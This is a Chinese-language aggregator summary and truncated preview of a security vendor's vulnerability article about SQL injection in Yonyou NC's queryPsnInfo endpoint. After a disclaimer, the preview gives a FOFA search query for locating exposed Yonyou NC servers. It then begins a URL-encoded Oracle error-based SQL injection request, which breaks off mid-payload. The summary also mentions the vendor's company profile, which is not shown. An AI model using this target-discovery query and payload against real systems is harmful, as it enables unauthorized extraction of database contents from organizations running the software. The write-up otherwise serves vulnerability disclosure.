主要观点总结
本文首先提醒读者阅读须知,明确所提供的技术资料仅供参考并需经授权使用,否则后果自负。接着描述了用友NC querypsninfo存在的SQL注入漏洞及其复现过程,提供了相应的攻击工具和技术细节。此外,还介绍了江西渝融云安全科技有限公司的相关信息,包括其业务范围、所获得的资质认证和荣誉等。
关键观点总结
关键观点1: 阅读须知和技术资料使用注意事项
提醒读者本文所提供的技术资料仅供参考并需经授权使用,未经授权使用可能造成直接或间接后果和损失,使用者需自负。
关键观点2: 用友NC querypsninfo存在的SQL注入漏洞
描述了用友NC系统中存在的SQL注入漏洞及其可能带来的风险。
关键观点3: 漏洞复现过程和攻击工具介绍
提供了复现漏洞的具体步骤和相应的攻击工具,包括使用fofa-qeury进行搜索和poc进行sql注入等。
关键观点4: 江西渝融云安全科技有限公司简介
介绍了公司的基本信息、业务范围、所获得的资质认证和荣誉等。
文章预览
0x01 阅读须知 融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。 本文所提 供的工具仅用于学习,禁止用于 其他! ! ! 0x02 漏洞描述 用友 NC querypsninfo 存在SQL注入漏洞。 0x03 漏洞复现 fofa-qeury: title="YONYOU NC" 1.执行poc进行sql注入,得到数据库信息 GET /ncchr/pm/obj/queryPsnInfo?staffid=1 %27 +AND+1754 %3 DUTL_INADDR.GET_HOST_ADDRESS %28 CHR %28113 %29 %7 C %7 CCHR %28106 %29 %7 C %7 CCHR %28122 %29 %7 C %7 CCHR %28118 %29 %7 C %7 CCHR %28113 %29 %7 C %7 C %28 SELECT+ %28 CASE+WHEN+ %281754 %3 D1754 %29 +THEN+1+ELSE+0+END %29 +FROM+DUAL %29 %7 C %7 CCHR %28113 %29 %7 C %7 CCHR %28112 %29 %7 C %7 CC
………………………………